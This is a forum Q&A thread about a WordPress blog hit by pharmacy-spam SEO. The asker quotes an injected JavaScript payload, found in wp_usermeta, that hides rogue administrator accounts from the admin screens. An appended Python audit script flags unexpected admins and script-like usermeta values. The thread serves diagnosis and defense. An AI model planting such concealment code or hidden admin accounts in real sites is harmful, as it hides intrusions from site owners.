One day after managing to defend against a massive DDoS attack, http://arabcrunch.com is now hacked by someone who seems to change the post titles into a Viagra ad on the Google search engine. Look how they damaged us: .google.com/search?hl=en&client=safari&rls=en&q=Viagra+Online+Pharmacy+-+Buy+Online+Viagra%2C+Cialis%2C+Levitra+wordpress+hack&aq=f&aqi=&aql=&oq=&gs_rfai=

and here google.com/search?hl=en&client=safari&rls=en&q=idescribe&btnG=Search&aq=f&aqi=g-s1g-sx2g-s1g-sx1&aql=&oq=&gs_rfai=

What we did is a clean WP install with clean plugins, and imported our DB with old posts and all pages. Then we added each plugin we need manually, then rebuilt the sitemap.xml.

But now we are doomed, as any keyword you search will get the result on Google with the title: Viagra Online Pharmacy - Buy Online Viagra, Cialis, Levitra

I found out in the DB table wp_usermeta, user_id: 16, that the username is a script:

var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator ((\d+))0){ var txt=arr[i].innerHTML.replace(/>Administrator ((\d+))Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName);

This is similar to a hack that ArabCrunch EN, along with thousands of WP blogs, suffered on 9 9 2009. Read about it and find links to solutions here: arabcrunch.com/2009/09/arabcrunch-and-wordpress-under-attack.html

After the install we found 2 new users: wordpress.org and system. Both are set as admin and have the same script set as their user name:

var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i 0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator ((d+))0){ var txt=arr[i].innerHTML.replace(/>Administrator ((d+))Administrator ("+(n[1]-1)+")

Any idea how to solve this?

+1  A: 

Export and clean your database before you import it into a new WP install: see FAQ: My site was hacked « WordPress Codex and how-to-completely-clean-your-hacked-wordpress-installation.

songdogtech
Thank you very much. I think this link from the WP Codex link you posted has the answer: http://blog.sucuri.net/2010/02/removing-malware-from-wordpress-blog.html
3GFalcon
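Added example, not part of the original thread or of WordPress itself: a check to run against the exported database before re-importing it, listing administrator accounts that are not on an expected list and wp_usermeta rows whose value contains JavaScript like the script quoted in the question. It assumes the default `wp_` table prefix; sqlite3 stands in for MySQL, and the sample rows, the `first_name` key and the `editor_in_chief` account are constructed.

```python
import re
import sqlite3

# Markers of JavaScript stored where a name or profile field should be.
# addLoadEvent and getElementById both appear in the script quoted in the question.
SCRIPT_RE = re.compile(r"<script|addLoadEvent|document\.getElementById|function\s*\(", re.I)

def audit_users(conn, expected_admins):
    """Return (unexpected_admins, script_rows) from wp_users / wp_usermeta."""
    cur = conn.cursor()
    # Roles live in wp_usermeta under the key wp_capabilities (serialized PHP array).
    cur.execute(
        "SELECT u.ID, u.user_login FROM wp_users u "
        "JOIN wp_usermeta m ON m.user_id = u.ID "
        "WHERE m.meta_key = 'wp_capabilities' AND m.meta_value LIKE '%administrator%' "
        "ORDER BY u.ID")
    unexpected = [(uid, login) for uid, login in cur.fetchall()
                  if login not in expected_admins]
    cur.execute("SELECT user_id, meta_key, meta_value FROM wp_usermeta ORDER BY umeta_id")
    script_rows = [(uid, key) for uid, key, value in cur.fetchall()
                   if SCRIPT_RE.search(value or "")]
    return unexpected, script_rows

def build_sample_db():
    """Constructed sample data; sqlite3 stands in for the site's MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
    """)
    admin = 'a:1:{s:13:"administrator";b:1;}'
    conn.executemany("INSERT INTO wp_users VALUES (?, ?)",
                     [(1, "editor_in_chief"), (2, "writer"), (16, "system")])
    conn.executemany(
        "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)",
        [(1, "wp_capabilities", admin),
         (1, "first_name", "Site"),
         (2, "wp_capabilities", 'a:1:{s:6:"author";b:1;}'),
         (16, "wp_capabilities", admin),
         (16, "first_name", "var setUserName = function(){ /* truncated */ }; addLoadEvent(setUserName);")])
    return conn

if __name__ == "__main__":
    unexpected, script_rows = audit_users(build_sample_db(), {"editor_in_chief"})
    print("unexpected admins:", unexpected)
    print("usermeta rows holding script:", script_rows)
```

Any account or row it reports should be removed from the export before the import, and the check repeated afterwards on the live database.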